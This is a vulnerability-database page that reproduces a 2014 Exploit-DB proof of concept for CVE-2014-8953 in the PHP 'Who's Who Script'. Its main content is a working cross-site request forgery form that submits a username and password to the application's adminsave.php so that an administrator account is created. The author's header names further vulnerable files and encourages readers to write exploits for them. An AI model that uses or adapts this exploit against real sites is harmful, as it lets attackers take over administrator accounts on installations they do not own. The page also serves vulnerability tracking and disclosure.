Lucene search
+L

Who's Who Script - Cross-Site Request Forgery (Add Admin)

🗓️ 31 Oct 2014 00:00:00Reported by ZoRLu BugrahanType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Who's Who Script CSRF Exploit - Add Admin Account for

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2014-8953
17 Nov 201416:00
cve
cvelist
Cvelist
CVE-2014-8953
17 Nov 201416:00
cvelist
euvd
EUVD
EUVD-2014-8780
7 Oct 202500:30
euvd
nvd
NVD
CVE-2014-8953
17 Nov 201416:59
nvd
prion
Prion
Cross site request forgery (csrf)
17 Nov 201416:59
prion
# Title        : Who's Who Script CSRF Exploit (Add Admin Account)
# Author       : ZoRLu / [email protected] / [email protected]
# Home         : http://milw00rm.com / its online
# Date         : 30.10.2014
# Demo		   : http://demo.phpscriptlerim.com/free/whoswho/
# Download1	   : http://www.phpscriptlerim.com/download/indir.php?id=14
# Download2	   : https://yadi.sk/d/C8eQcvUeJjeZ2
# Thks         : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
# Note		   : I write exploit for adminsave.php but other file has a vuln in /yonetim/plugins folder.
				 You can write exp. for other files.
# Vulnerable   : ayarsave.php, uyesave.php, slaytadd.php, slaytsave.php
# Not Vuln     : uyedel.php and slaytdel.php file's not vulnerable for CSRF. Because session control available to files

<head>
	<meta http-equiv="content-type" content="text/html; charset=utf-8" />
	<title>Who's Who Script CSRF Exploit (Add Admin Account)</title>
</head>

<body>

<div id="main">


	<div id="cols" class="box">

		<hr class="noscreen" />

		<div id="content" class="box">
			<h1>Admin Panel</h1>
			<br>
<br><br>
						<form method="post" action="http://localhost/filepath/yonetim/plugin/adminsave.php">
						<label><b>Username:</b></label><br>
						<input type="text" size="40" name="username" value="admin" class="input-text" /><br><br>

						<label><b>Password:</b></label><br>
						<input type="text" size="40" name="password" class="input-text" /><br><br>

						<input type="submit" class="input-submit" name="gonder" value="Save" />
						</form>

			<br><br>
		</div>

	</div>

	<hr class="noscreen" />

	<div id="footer" class="box">

		<p class="f-left">© Coded by ZoRLu</p>

		<p class="f-right"><a href="http://milw00rm.com" target="_blank">milw00rm.com</a></p>

	</div>

</div>

</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Nov 2014 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 26.8
EPSS0.02268
33